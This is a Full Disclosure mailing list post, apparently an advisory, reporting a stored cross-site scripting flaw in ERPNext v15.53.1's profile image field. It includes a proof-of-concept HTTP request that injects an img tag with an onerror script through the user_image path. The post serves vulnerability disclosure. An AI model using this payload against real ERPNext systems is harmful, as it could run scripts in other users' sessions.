
Full Disclosure mailing list archives
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
From: Ron E <ronaldjedgerson () gmail com>
Date: Fri, 30 May 2025 23:17:41 -0400
An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:*POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: --host-- profile_info={"user_image":"/private/files/\"><img src=x onerror=alert('XSS')>fd12cb.jpg"} _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path Ron E (Jun 03)